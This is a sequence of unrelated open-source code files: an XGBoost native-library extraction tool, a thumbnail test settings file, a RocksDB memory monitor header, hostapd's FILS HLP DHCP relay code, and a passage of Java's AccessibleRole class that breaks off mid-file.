<gh_stars>1000+ package water.tools; import hex.tree.xgboost.XGBoostExtension; import hex.tree.xgboost.util.NativeLibrary; import hex.tree.xgboost.util.NativeLibraryLoaderChain; import java.io.File; import java.io.IOException; public class XGBoostLibExtractTool { public static void main(String[] args) throws IOException { if (args.length != 1) { System.err.println("XGBoostLibExtractTool: Specify target directory where to extract XGBoost native libraries."); System.exit(-1); } File dir = new File(args[0]); if (!dir.exists()) { System.err.println("XGBoostLibExtractTool: Directory '" + dir.getAbsolutePath() + "' doesn't exist."); System.exit(-1); } NativeLibraryLoaderChain loader = XGBoostExtension.getLoader(); if (loader == null) { System.err.println("XGBoostLibExtractTool: Failed to locate native libraries."); System.exit(-1); } for (NativeLibrary lib : loader.getNativeLibs()) { if (!lib.isBundled()) continue; File libFile = lib.extractTo(dir); System.out.println("Extracted native library: " + libFile.getAbsolutePath()); } } }
539
630
<filename>tests/settings/wand.py from .default import * THUMBNAIL_ENGINE = 'sorl.thumbnail.engines.wand_engine.Engine'
47
2,759
// Copyright (c) YugaByte, Inc. // // Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except // in compliance with the License. You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software distributed under the License // is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express // or implied. See the License for the specific language governing permissions and limitations // under the License. // #ifndef YB_ROCKSDB_MEMORY_MONITOR_H #define YB_ROCKSDB_MEMORY_MONITOR_H #include <atomic> #include <functional> #include "yb/rocksdb/port/likely.h" namespace rocksdb { // Counts the total memory of the registered write_buffers, and notifies the // callback if the limit is exceeded. class MemoryMonitor { public: explicit MemoryMonitor(size_t limit, std::function<void()> exceeded_callback) : limit_(limit), exceeded_callback_(std::move(exceeded_callback)) {} ~MemoryMonitor() {} size_t memory_usage() const { return memory_used_.load(std::memory_order_relaxed); } size_t limit() const { return limit_; } bool Exceeded() const { return Exceeded(memory_usage()); } void ReservedMem(size_t mem) { auto new_value = memory_used_.fetch_add(mem, std::memory_order_release) + mem; if (UNLIKELY(Exceeded(new_value))) { exceeded_callback_(); } } void FreedMem(size_t mem) { memory_used_.fetch_sub(mem, std::memory_order_relaxed); } // No copying allowed MemoryMonitor(const MemoryMonitor&) = delete; void operator=(const MemoryMonitor&) = delete; private: bool Exceeded(size_t size) const { return limit() > 0 && size >= limit(); } const size_t limit_; const std::function<void()> exceeded_callback_; std::atomic<size_t> memory_used_ {0}; }; } // namespace rocksdb #endif // YB_ROCKSDB_MEMORY_MONITOR_H
656
1,104
<reponame>ArrowOS/android_external_wpa_supplicant_8 /* * FILS HLP request processing * Copyright (c) 2017, Qualcomm Atheros, Inc. * * This software may be distributed under the terms of the BSD license. * See README for more details. */ #include "utils/includes.h" #include "utils/common.h" #include "utils/eloop.h" #include "common/dhcp.h" #include "hostapd.h" #include "sta_info.h" #include "ieee802_11.h" #include "fils_hlp.h" static be16 ip_checksum(const void *buf, size_t len) { u32 sum = 0; const u16 *pos; for (pos = buf; len >= 2; len -= 2) sum += ntohs(*pos++); if (len) sum += ntohs(*pos << 8); sum = (sum >> 16) + (sum & 0xffff); sum += sum >> 16; return htons(~sum); } static int fils_dhcp_request(struct hostapd_data *hapd, struct sta_info *sta, struct dhcp_data *dhcpoffer, u8 *dhcpofferend) { u8 *pos, *end; struct dhcp_data *dhcp; struct sockaddr_in addr; ssize_t res; const u8 *server_id = NULL; if (!sta->hlp_dhcp_discover) { wpa_printf(MSG_DEBUG, "FILS: No pending HLP DHCPDISCOVER available"); return -1; } /* Convert to DHCPREQUEST, remove rapid commit option, replace requested * IP address option with yiaddr. */ pos = wpabuf_mhead(sta->hlp_dhcp_discover); end = pos + wpabuf_len(sta->hlp_dhcp_discover); dhcp = (struct dhcp_data *) pos; pos = (u8 *) (dhcp + 1); pos += 4; /* skip magic */ while (pos < end && *pos != DHCP_OPT_END) { u8 opt, olen; opt = *pos++; if (opt == DHCP_OPT_PAD) continue; if (pos >= end) break; olen = *pos++; if (olen > end - pos) break; switch (opt) { case DHCP_OPT_MSG_TYPE: if (olen > 0) *pos = DHCPREQUEST; break; case DHCP_OPT_RAPID_COMMIT: case DHCP_OPT_REQUESTED_IP_ADDRESS: case DHCP_OPT_SERVER_ID: /* Remove option */ pos -= 2; os_memmove(pos, pos + 2 + olen, end - pos - 2 - olen); end -= 2 + olen; olen = 0; break; } pos += olen; } if (pos >= end || *pos != DHCP_OPT_END) { wpa_printf(MSG_DEBUG, "FILS: Could not update DHCPDISCOVER"); return -1; } sta->hlp_dhcp_discover->used = pos - (u8 *) dhcp; /* Copy Server ID option from DHCPOFFER to DHCPREQUEST */ pos = (u8 *) (dhcpoffer + 1); end = dhcpofferend; pos += 4; /* skip magic */ while (pos < end && *pos != DHCP_OPT_END) { u8 opt, olen; opt = *pos++; if (opt == DHCP_OPT_PAD) continue; if (pos >= end) break; olen = *pos++; if (olen > end - pos) break; switch (opt) { case DHCP_OPT_SERVER_ID: server_id = pos - 2; break; } pos += olen; } if (wpabuf_resize(&sta->hlp_dhcp_discover, 6 + 1 + (server_id ? 2 + server_id[1] : 0))) return -1; if (server_id) wpabuf_put_data(sta->hlp_dhcp_discover, server_id, 2 + server_id[1]); wpabuf_put_u8(sta->hlp_dhcp_discover, DHCP_OPT_REQUESTED_IP_ADDRESS); wpabuf_put_u8(sta->hlp_dhcp_discover, 4); wpabuf_put_data(sta->hlp_dhcp_discover, &dhcpoffer->your_ip, 4); wpabuf_put_u8(sta->hlp_dhcp_discover, DHCP_OPT_END); os_memset(&addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = hapd->conf->dhcp_server.u.v4.s_addr; addr.sin_port = htons(hapd->conf->dhcp_server_port); res = sendto(hapd->dhcp_sock, wpabuf_head(sta->hlp_dhcp_discover), wpabuf_len(sta->hlp_dhcp_discover), 0, (const struct sockaddr *) &addr, sizeof(addr)); if (res < 0) { wpa_printf(MSG_ERROR, "FILS: DHCP sendto failed: %s", strerror(errno)); return -1; } wpa_printf(MSG_DEBUG, "FILS: Acting as DHCP rapid commit proxy for %s:%d", inet_ntoa(addr.sin_addr), ntohs(addr.sin_port)); wpabuf_free(sta->hlp_dhcp_discover); sta->hlp_dhcp_discover = NULL; sta->fils_dhcp_rapid_commit_proxy = 1; return 0; } static void fils_dhcp_handler(int sd, void *eloop_ctx, void *sock_ctx) { struct hostapd_data *hapd = sock_ctx; struct sta_info *sta; u8 buf[1500], *pos, *end, *end_opt = NULL; struct dhcp_data *dhcp; struct sockaddr_in addr; socklen_t addr_len; ssize_t res; u8 msgtype = 0; int rapid_commit = 0; struct ip *iph; struct udphdr *udph; struct wpabuf *resp; const u8 *rpos; size_t left, len; addr_len = sizeof(addr); res = recvfrom(sd, buf, sizeof(buf), 0, (struct sockaddr *) &addr, &addr_len); if (res < 0) { wpa_printf(MSG_DEBUG, "FILS: DHCP read failed: %s", strerror(errno)); return; } wpa_printf(MSG_DEBUG, "FILS: DHCP response from server %s:%d (len=%d)", inet_ntoa(addr.sin_addr), ntohs(addr.sin_port), (int) res); wpa_hexdump(MSG_MSGDUMP, "FILS: HLP - DHCP server response", buf, res); if ((size_t) res < sizeof(*dhcp)) return; dhcp = (struct dhcp_data *) buf; if (dhcp->op != 2) return; /* Not a BOOTREPLY */ if (dhcp->relay_ip != hapd->conf->own_ip_addr.u.v4.s_addr) { wpa_printf(MSG_DEBUG, "FILS: HLP - DHCP response to unknown relay address 0x%x", dhcp->relay_ip); return; } dhcp->relay_ip = 0; pos = (u8 *) (dhcp + 1); end = &buf[res]; if (end - pos < 4 || WPA_GET_BE32(pos) != DHCP_MAGIC) { wpa_printf(MSG_DEBUG, "FILS: HLP - no DHCP magic in response"); return; } pos += 4; wpa_hexdump(MSG_DEBUG, "FILS: HLP - DHCP options in response", pos, end - pos); while (pos < end && *pos != DHCP_OPT_END) { u8 opt, olen; opt = *pos++; if (opt == DHCP_OPT_PAD) continue; if (pos >= end) break; olen = *pos++; if (olen > end - pos) break; switch (opt) { case DHCP_OPT_MSG_TYPE: if (olen > 0) msgtype = pos[0]; break; case DHCP_OPT_RAPID_COMMIT: rapid_commit = 1; break; } pos += olen; } if (pos < end && *pos == DHCP_OPT_END) end_opt = pos; wpa_printf(MSG_DEBUG, "FILS: HLP - DHCP message type %u (rapid_commit=%d hw_addr=" MACSTR ")", msgtype, rapid_commit, MAC2STR(dhcp->hw_addr)); sta = ap_get_sta(hapd, dhcp->hw_addr); if (!sta || !sta->fils_pending_assoc_req) { wpa_printf(MSG_DEBUG, "FILS: No pending HLP DHCP exchange with hw_addr " MACSTR, MAC2STR(dhcp->hw_addr)); return; } if (hapd->conf->dhcp_rapid_commit_proxy && msgtype == DHCPOFFER && !rapid_commit) { /* Use hostapd to take care of 4-message exchange and convert * the final DHCPACK to rapid commit version. */ if (fils_dhcp_request(hapd, sta, dhcp, end) == 0) return; /* failed, so send the server response as-is */ } else if (msgtype != DHCPACK) { wpa_printf(MSG_DEBUG, "FILS: No DHCPACK available from the server and cannot do rapid commit proxying"); } pos = buf; resp = wpabuf_alloc(2 * ETH_ALEN + 6 + 2 + sizeof(*iph) + sizeof(*udph) + (end - pos) + 2); if (!resp) return; wpabuf_put_data(resp, sta->addr, ETH_ALEN); wpabuf_put_data(resp, hapd->own_addr, ETH_ALEN); wpabuf_put_data(resp, "\xaa\xaa\x03\x00\x00\x00", 6); wpabuf_put_be16(resp, ETH_P_IP); iph = wpabuf_put(resp, sizeof(*iph)); iph->ip_v = 4; iph->ip_hl = sizeof(*iph) / 4; iph->ip_len = htons(sizeof(*iph) + sizeof(*udph) + (end - pos)); iph->ip_ttl = 1; iph->ip_p = 17; /* UDP */ iph->ip_src.s_addr = hapd->conf->dhcp_server.u.v4.s_addr; iph->ip_dst.s_addr = dhcp->client_ip; iph->ip_sum = ip_checksum(iph, sizeof(*iph)); udph = wpabuf_put(resp, sizeof(*udph)); udph->uh_sport = htons(DHCP_SERVER_PORT); udph->uh_dport = htons(DHCP_CLIENT_PORT); udph->uh_ulen = htons(sizeof(*udph) + (end - pos)); udph->uh_sum = htons(0x0000); /* TODO: calculate checksum */ if (hapd->conf->dhcp_rapid_commit_proxy && msgtype == DHCPACK && !rapid_commit && sta->fils_dhcp_rapid_commit_proxy && end_opt) { /* Add rapid commit option */ wpabuf_put_data(resp, pos, end_opt - pos); wpabuf_put_u8(resp, DHCP_OPT_RAPID_COMMIT); wpabuf_put_u8(resp, 0); wpabuf_put_data(resp, end_opt, end - end_opt); } else { wpabuf_put_data(resp, pos, end - pos); } if (wpabuf_resize(&sta->fils_hlp_resp, wpabuf_len(resp) + 2 * wpabuf_len(resp) / 255 + 100)) { wpabuf_free(resp); return; } rpos = wpabuf_head(resp); left = wpabuf_len(resp); wpabuf_put_u8(sta->fils_hlp_resp, WLAN_EID_EXTENSION); /* Element ID */ if (left <= 254) len = 1 + left; else len = 255; wpabuf_put_u8(sta->fils_hlp_resp, len); /* Length */ /* Element ID Extension */ wpabuf_put_u8(sta->fils_hlp_resp, WLAN_EID_EXT_FILS_HLP_CONTAINER); /* Destination MAC Address, Source MAC Address, HLP Packet. * HLP Packet is in MSDU format (i.e., including the LLC/SNAP header * when LPD is used). */ wpabuf_put_data(sta->fils_hlp_resp, rpos, len - 1); rpos += len - 1; left -= len - 1; while (left) { wpabuf_put_u8(sta->fils_hlp_resp, WLAN_EID_FRAGMENT); len = left > 255 ? 255 : left; wpabuf_put_u8(sta->fils_hlp_resp, len); wpabuf_put_data(sta->fils_hlp_resp, rpos, len); rpos += len; left -= len; } wpabuf_free(resp); if (sta->fils_drv_assoc_finish) hostapd_notify_assoc_fils_finish(hapd, sta); else fils_hlp_finish_assoc(hapd, sta); } static int fils_process_hlp_dhcp(struct hostapd_data *hapd, struct sta_info *sta, const u8 *msg, size_t len) { const struct dhcp_data *dhcp; struct wpabuf *dhcp_buf; struct dhcp_data *dhcp_msg; u8 msgtype = 0; int rapid_commit = 0; const u8 *pos = msg, *end; struct sockaddr_in addr; ssize_t res; if (len < sizeof(*dhcp)) return 0; dhcp = (const struct dhcp_data *) pos; end = pos + len; wpa_printf(MSG_DEBUG, "FILS: HLP request DHCP: op=%u htype=%u hlen=%u hops=%u xid=0x%x", dhcp->op, dhcp->htype, dhcp->hlen, dhcp->hops, ntohl(dhcp->xid)); pos += sizeof(*dhcp); if (dhcp->op != 1) return 0; /* Not a BOOTREQUEST */ if (end - pos < 4) return 0; if (WPA_GET_BE32(pos) != DHCP_MAGIC) { wpa_printf(MSG_DEBUG, "FILS: HLP - no DHCP magic"); return 0; } pos += 4; wpa_hexdump(MSG_DEBUG, "FILS: HLP - DHCP options", pos, end - pos); while (pos < end && *pos != DHCP_OPT_END) { u8 opt, olen; opt = *pos++; if (opt == DHCP_OPT_PAD) continue; if (pos >= end) break; olen = *pos++; if (olen > end - pos) break; switch (opt) { case DHCP_OPT_MSG_TYPE: if (olen > 0) msgtype = pos[0]; break; case DHCP_OPT_RAPID_COMMIT: rapid_commit = 1; break; } pos += olen; } wpa_printf(MSG_DEBUG, "FILS: HLP - DHCP message type %u", msgtype); if (msgtype != DHCPDISCOVER) return 0; if (hapd->conf->dhcp_server.af != AF_INET || hapd->conf->dhcp_server.u.v4.s_addr == 0) { wpa_printf(MSG_DEBUG, "FILS: HLP - no DHCPv4 server configured - drop request"); return 0; } if (hapd->conf->own_ip_addr.af != AF_INET || hapd->conf->own_ip_addr.u.v4.s_addr == 0) { wpa_printf(MSG_DEBUG, "FILS: HLP - no IPv4 own_ip_addr configured - drop request"); return 0; } if (hapd->dhcp_sock < 0) { int s; s = socket(AF_INET, SOCK_DGRAM, 0); if (s < 0) { wpa_printf(MSG_ERROR, "FILS: Failed to open DHCP socket: %s", strerror(errno)); return 0; } if (hapd->conf->dhcp_relay_port) { os_memset(&addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = hapd->conf->own_ip_addr.u.v4.s_addr; addr.sin_port = htons(hapd->conf->dhcp_relay_port); if (bind(s, (struct sockaddr *) &addr, sizeof(addr))) { wpa_printf(MSG_ERROR, "FILS: Failed to bind DHCP socket: %s", strerror(errno)); close(s); return 0; } } if (eloop_register_sock(s, EVENT_TYPE_READ, fils_dhcp_handler, NULL, hapd)) { close(s); return 0; } hapd->dhcp_sock = s; } dhcp_buf = wpabuf_alloc(len); if (!dhcp_buf) return 0; dhcp_msg = wpabuf_put(dhcp_buf, len); os_memcpy(dhcp_msg, msg, len); dhcp_msg->relay_ip = hapd->conf->own_ip_addr.u.v4.s_addr; os_memset(&addr, 0, sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = hapd->conf->dhcp_server.u.v4.s_addr; addr.sin_port = htons(hapd->conf->dhcp_server_port); res = sendto(hapd->dhcp_sock, dhcp_msg, len, 0, (const struct sockaddr *) &addr, sizeof(addr)); if (res < 0) { wpa_printf(MSG_ERROR, "FILS: DHCP sendto failed: %s", strerror(errno)); wpabuf_free(dhcp_buf); /* Close the socket to try to recover from error */ eloop_unregister_read_sock(hapd->dhcp_sock); close(hapd->dhcp_sock); hapd->dhcp_sock = -1; return 0; } wpa_printf(MSG_DEBUG, "FILS: HLP relayed DHCP request to server %s:%d (rapid_commit=%d)", inet_ntoa(addr.sin_addr), ntohs(addr.sin_port), rapid_commit); if (hapd->conf->dhcp_rapid_commit_proxy && rapid_commit) { /* Store a copy of the DHCPDISCOVER for rapid commit proxying * purposes if the server does not support the rapid commit * option. */ wpa_printf(MSG_DEBUG, "FILS: Store DHCPDISCOVER for rapid commit proxy"); wpabuf_free(sta->hlp_dhcp_discover); sta->hlp_dhcp_discover = dhcp_buf; } else { wpabuf_free(dhcp_buf); } return 1; } static int fils_process_hlp_udp(struct hostapd_data *hapd, struct sta_info *sta, const u8 *dst, const u8 *pos, size_t len) { const struct ip *iph; const struct udphdr *udph; u16 sport, dport, ulen; if (len < sizeof(*iph) + sizeof(*udph)) return 0; iph = (const struct ip *) pos; udph = (const struct udphdr *) (iph + 1); sport = ntohs(udph->uh_sport); dport = ntohs(udph->uh_dport); ulen = ntohs(udph->uh_ulen); wpa_printf(MSG_DEBUG, "FILS: HLP request UDP: sport=%u dport=%u ulen=%u sum=0x%x", sport, dport, ulen, ntohs(udph->uh_sum)); /* TODO: Check UDP checksum */ if (ulen < sizeof(*udph) || ulen > len - sizeof(*iph)) return 0; if (dport == DHCP_SERVER_PORT && sport == DHCP_CLIENT_PORT) { return fils_process_hlp_dhcp(hapd, sta, (const u8 *) (udph + 1), ulen - sizeof(*udph)); } return 0; } static int fils_process_hlp_ip(struct hostapd_data *hapd, struct sta_info *sta, const u8 *dst, const u8 *pos, size_t len) { const struct ip *iph; uint16_t ip_len; if (len < sizeof(*iph)) return 0; iph = (const struct ip *) pos; if (ip_checksum(iph, sizeof(*iph)) != 0) { wpa_printf(MSG_DEBUG, "FILS: HLP request IPv4 packet had invalid header checksum - dropped"); return 0; } ip_len = ntohs(iph->ip_len); if (ip_len > len) return 0; wpa_printf(MSG_DEBUG, "FILS: HLP request IPv4: saddr=%08x daddr=%08x protocol=%u", iph->ip_src.s_addr, iph->ip_dst.s_addr, iph->ip_p); switch (iph->ip_p) { case 17: return fils_process_hlp_udp(hapd, sta, dst, pos, len); } return 0; } static int fils_process_hlp_req(struct hostapd_data *hapd, struct sta_info *sta, const u8 *pos, size_t len) { const u8 *pkt, *end; wpa_printf(MSG_DEBUG, "FILS: HLP request from " MACSTR " (dst=" MACSTR " src=" MACSTR " len=%u)", MAC2STR(sta->addr), MAC2STR(pos), MAC2STR(pos + ETH_ALEN), (unsigned int) len); if (os_memcmp(sta->addr, pos + ETH_ALEN, ETH_ALEN) != 0) { wpa_printf(MSG_DEBUG, "FILS: Ignore HLP request with unexpected source address" MACSTR, MAC2STR(pos + ETH_ALEN)); return 0; } end = pos + len; pkt = pos + 2 * ETH_ALEN; if (end - pkt >= 6 && os_memcmp(pkt, "\xaa\xaa\x03\x00\x00\x00", 6) == 0) pkt += 6; /* Remove SNAP/LLC header */ wpa_hexdump(MSG_MSGDUMP, "FILS: HLP request packet", pkt, end - pkt); if (end - pkt < 2) return 0; switch (WPA_GET_BE16(pkt)) { case ETH_P_IP: return fils_process_hlp_ip(hapd, sta, pos, pkt + 2, end - pkt - 2); } return 0; } int fils_process_hlp(struct hostapd_data *hapd, struct sta_info *sta, const u8 *pos, int left) { const u8 *end = pos + left; u8 *tmp, *tmp_pos; int ret = 0; if (sta->fils_pending_assoc_req && eloop_is_timeout_registered(fils_hlp_timeout, hapd, sta)) { /* Do not process FILS HLP request again if the station * retransmits (Re)Association Request frame before the previous * HLP response has either been received or timed out. */ wpa_printf(MSG_DEBUG, "FILS: Do not relay another HLP request from " MACSTR " before processing of the already pending one has been completed", MAC2STR(sta->addr)); return 1; } /* Old DHCPDISCOVER is not needed anymore, if it was still pending */ wpabuf_free(sta->hlp_dhcp_discover); sta->hlp_dhcp_discover = NULL; sta->fils_dhcp_rapid_commit_proxy = 0; /* Check if there are any FILS HLP Container elements */ while (end - pos >= 2) { if (2 + pos[1] > end - pos) return 0; if (pos[0] == WLAN_EID_EXTENSION && pos[1] >= 1 + 2 * ETH_ALEN && pos[2] == WLAN_EID_EXT_FILS_HLP_CONTAINER) break; pos += 2 + pos[1]; } if (end - pos < 2) return 0; /* No FILS HLP Container elements */ tmp = os_malloc(end - pos); if (!tmp) return 0; while (end - pos >= 2) { if (2 + pos[1] > end - pos || pos[0] != WLAN_EID_EXTENSION || pos[1] < 1 + 2 * ETH_ALEN || pos[2] != WLAN_EID_EXT_FILS_HLP_CONTAINER) break; tmp_pos = tmp; os_memcpy(tmp_pos, pos + 3, pos[1] - 1); tmp_pos += pos[1] - 1; pos += 2 + pos[1]; /* Add possible fragments */ while (end - pos >= 2 && pos[0] == WLAN_EID_FRAGMENT && 2 + pos[1] <= end - pos) { os_memcpy(tmp_pos, pos + 2, pos[1]); tmp_pos += pos[1]; pos += 2 + pos[1]; } if (fils_process_hlp_req(hapd, sta, tmp, tmp_pos - tmp) > 0) ret = 1; } os_free(tmp); return ret; } void fils_hlp_deinit(struct hostapd_data *hapd) { if (hapd->dhcp_sock >= 0) { eloop_unregister_read_sock(hapd->dhcp_sock); close(hapd->dhcp_sock); hapd->dhcp_sock = -1; } }
8,088
543
<gh_stars>100-1000 /* * Copyright (c) 1997, 2017, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the LICENSE file that accompanied this code. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. */ package javax.accessibility; /** * Class {@code AccessibleRole} determines the role of a component. The role of * a component describes its generic function. (E.G., "push button," "table," or * "list.") * <p> * The {@link #toDisplayString()} method allows you to obtain the localized * string for a locale independent key from a predefined {@code ResourceBundle} * for the keys defined in this class. * <p> * The constants in this class present a strongly typed enumeration of common * object roles. A public constructor for this class has been purposely omitted * and applications should use one of the constants from this class. If the * constants in this class are not sufficient to describe the role of an object, * a subclass should be generated from this class and it should provide * constants in a similar manner. * * @author <NAME> * @author <NAME> * @author <NAME> */ public class AccessibleRole extends AccessibleBundle { // If you add or remove anything from here, make sure you // update AccessibleResourceBundle.java. /** * Object is used to alert the user about something. */ public static final AccessibleRole ALERT = new AccessibleRole("alert"); /** * The header for a column of data. */ public static final AccessibleRole COLUMN_HEADER = new AccessibleRole("columnheader"); /** * Object that can be drawn into and is used to trap events. * * @see #FRAME * @see #GLASS_PANE * @see #LAYERED_PANE */ public static final AccessibleRole CANVAS = new AccessibleRole("canvas"); /** * A list of choices the user can select from. Also optionally allows the * user to enter a choice of their own. */ public static final AccessibleRole COMBO_BOX = new AccessibleRole("combobox"); /** * An iconified internal frame in a {@code DESKTOP_PANE}. * * @see #DESKTOP_PANE * @see #INTERNAL_FRAME */ public static final AccessibleRole DESKTOP_ICON = new AccessibleRole("desktopicon"); /** * An object containing a collection of {@code Accessibles} that together * represents {@code HTML} content. The child {@code Accessibles} would * include objects implementing {@code AccessibleText}, * {@code AccessibleHypertext}, {@code AccessibleIcon}, and other * interfaces. * * @see #HYPERLINK * @see AccessibleText * @see AccessibleHypertext * @see AccessibleHyperlink * @see AccessibleIcon * @since 1.6 */ public static final AccessibleRole HTML_CONTAINER = new AccessibleRole("htmlcontainer"); /** * A frame-like object that is clipped by a desktop pane. The desktop pane, * internal frame, and desktop icon objects are often used to create * multiple document interfaces within an application. * * @see #DESKTOP_ICON * @see #DESKTOP_PANE * @see #FRAME */ public static final AccessibleRole INTERNAL_FRAME = new AccessibleRole("internalframe"); /** * A pane that supports internal frames and iconified versions of those * internal frames. * * @see #DESKTOP_ICON * @see #INTERNAL_FRAME */ public static final AccessibleRole DESKTOP_PANE = new AccessibleRole("desktoppane"); /** * A specialized pane whose primary use is inside a {@code DIALOG}. * * @see #DIALOG */ public static final AccessibleRole OPTION_PANE = new AccessibleRole("optionpane"); /** * A top level window with no title or border. * * @see #FRAME * @see #DIALOG */ public static final AccessibleRole WINDOW = new AccessibleRole("window"); /** * A top level window with a title bar, border, menu bar, etc. It is often * used as the primary window for an application. * * @see #DIALOG * @see #CANVAS * @see #WINDOW */ public static final AccessibleRole FRAME = new AccessibleRole("frame"); /** * A top level window with title bar and a border. A dialog is similar to a * frame, but it has fewer properties and is often used as a secondary * window for an application. * * @see #FRAME * @see #WINDOW */ public static final AccessibleRole DIALOG = new AccessibleRole("dialog"); /** * A specialized pane that lets the user choose a color. */ public static final AccessibleRole COLOR_CHOOSER = new AccessibleRole("colorchooser"); /** * A pane that allows the user to navigate through and select the contents * of a directory. May be used by a file chooser. * * @see #FILE_CHOOSER */ public static final AccessibleRole DIRECTORY_PANE = new AccessibleRole("directorypane"); /** * A specialized dialog that displays the files in the directory and lets * the user select a file, browse a different directory, or specify a * filename. May use the directory pane to show the contents of a directory. * * @see #DIRECTORY_PANE */ public static final AccessibleRole FILE_CHOOSER = new AccessibleRole("filechooser"); /** * An object that fills up space in a user interface. It is often used in * interfaces to tweak the spacing between components, but serves no other * purpose. */ public static final AccessibleRole FILLER = new AccessibleRole("filler"); /** * A hypertext anchor. */ public static final AccessibleRole HYPERLINK = new AccessibleRole("hyperlink"); /** * A small fixed size picture, typically used to decorate components. */ public static final AccessibleRole ICON = new AccessibleRole("icon"); /** * An object used to present an icon or short string in an interface. */ public static final AccessibleRole LABEL = new AccessibleRole("label"); /** * A specialized pane that has a glass pane and a layered pane as its * children. * * @see #GLASS_PANE * @see #LAYERED_PANE */ public static final AccessibleRole ROOT_PANE = new AccessibleRole("rootpane"); /** * A pane that is guaranteed to be painted on top of all panes beneath it. * * @see #ROOT_PANE * @see #CANVAS */ public static final AccessibleRole GLASS_PANE = new AccessibleRole("glasspane"); /** * A specialized pane that allows its children to be drawn in layers, * providing a form of stacking order. This is usually the pane that holds * the menu bar as well as the pane that contains most of the visual * components in a window. * * @see #GLASS_PANE * @see #ROOT_PANE */ public static final AccessibleRole LAYERED_PANE = new AccessibleRole("layeredpane"); /** * An object that presents a list of objects to the user and allows the user * to select one or more of them. A list is usually contained within a * scroll pane. * * @see #SCROLL_PANE * @see #LIST_ITEM */ public static final AccessibleRole LIST = new AccessibleRole("list"); /** * An object that presents an element in a list. A list is usually contained * within a scroll pane. * * @see #SCROLL_PANE * @see #LIST */ public static final AccessibleRole LIST_ITEM = new AccessibleRole("listitem"); /** * An object usually drawn at the top of the primary dialog box of an * application that contains a list of menus the user can choose from. For * example, a menu bar might contain menus for "File," "Edit," and "Help." * * @see #MENU * @see #POPUP_MENU * @see #LAYERED_PANE */ public static final AccessibleRole MENU_BAR = new AccessibleRole("menubar"); /** * A temporary window that is usually used to offer the user a list of * choices, and then hides when the user selects one of those choices. * * @see #MENU * @see #MENU_ITEM */ public static final AccessibleRole POPUP_MENU = new AccessibleRole("popupmenu"); /** * An object usually found inside a menu bar that contains a list of actions * the user can choose from. A menu can have any object as its children, but * most often they are menu items, other menus, or rudimentary objects such * as radio buttons, check boxes, or separators. For example, an application * may have an "Edit" menu that contains menu items for "Cut" and "Paste." * * @see #MENU_BAR * @see #MENU_ITEM * @see #SEPARATOR * @see #RADIO_BUTTON * @see #CHECK_BOX * @see #POPUP_MENU */ public static final AccessibleRole MENU = new AccessibleRole("menu"); /** * An object usually contained in a menu that presents an action the user * can choose. For example, the "Cut" menu item in an "Edit" menu would be * an action the user can select to cut the selected area of text in a * document. * * @see #MENU_BAR * @see #SEPARATOR * @see #POPUP_MENU */ public static final AccessibleRole MENU_ITEM = new AccessibleRole("menuitem"); /** * An object usually contained in a menu to provide a visual and logical * separation of the contents in a menu. For example, the "File" menu of an * application might contain menu items for "Open," "Close," and "Exit," and * will place a separator between "Close" and "Exit" menu items. * * @see #MENU * @see #MENU_ITEM */ public static final AccessibleRole SEPARATOR = new AccessibleRole("separator"); /** * An object that presents a series of panels (or page tabs), one at a time, * through some mechanism provided by the object. The most common mechanism * is a list of tabs at the top of the panel. The children of a page tab * list are all page tabs. * * @see #PAGE_TAB */ public static final AccessibleRole PAGE_TAB_LIST = new AccessibleRole("pagetablist"); /** * An object that is a child of a page tab list. Its sole child is the panel * that is to be presented to the user when the user selects the page tab * from the list of tabs in the page tab list. * * @see #PAGE_TAB_LIST */ public static final AccessibleRole PAGE_TAB = new AccessibleRole("pagetab"); /** * A generic container that is often used to group objects. */ public static final AccessibleRole PANEL = new AccessibleRole("panel"); /** * An object used to indicate how much of a task has been completed. */ public static final AccessibleRole PROGRESS_BAR = new AccessibleRole("progressbar"); /** * A text object used for passwords, or other places where the text contents * is not shown visibly to the user. */ public static final AccessibleRole PASSWORD_TEXT = new AccessibleRole("passwordtext"); /** * An object the user can manipulate to tell the application to do * something. * * @see #CHECK_BOX * @see #TOGGLE_BUTTON * @see #RADIO_BUTTON */ public static final AccessibleRole PUSH_BUTTON = new AccessibleRole("pushbutton"); /** * A specialized push button that can be checked or unchecked, but does not * provide a separate indicator for the current state. * * @see #PUSH_BUTTON * @see #CHECK_BOX * @see #RADIO_BUTTON */ public static final AccessibleRole TOGGLE_BUTTON = new AccessibleRole("togglebutton"); /** * A choice that can be checked or unchecked and provides a separate * indicator for the current state. * * @see #PUSH_BUTTON * @see #TOGGLE_BUTTON * @see #RADIO_BUTTON */ public static final AccessibleRole CHECK_BOX = new AccessibleRole("checkbox"); /** * A specialized check box that will cause other radio buttons in the same * group to become unchecked when this one is checked. * * @see #PUSH_BUTTON * @see #TOGGLE_BUTTON * @see #CHECK_BOX */ public static final AccessibleRole RADIO_BUTTON = new AccessibleRole("radiobutton"); /** * The header for a row of data. */ public static final AccessibleRole ROW_HEADER = new AccessibleRole("rowheader"); /** * An object that allows a user to incrementally view a large amount of * information. Its children can include scroll bars and a viewport. * * @see #SCROLL_BAR * @see #VIEWPORT */ public static final AccessibleRole SCROLL_PANE = new AccessibleRole("scrollpane"); /** * An object usually used to allow a user to incrementally view a large * amount of data. Usually used only by a scroll pane. * * @see #SCROLL_PANE */ public static final AccessibleRole SCROLL_BAR = 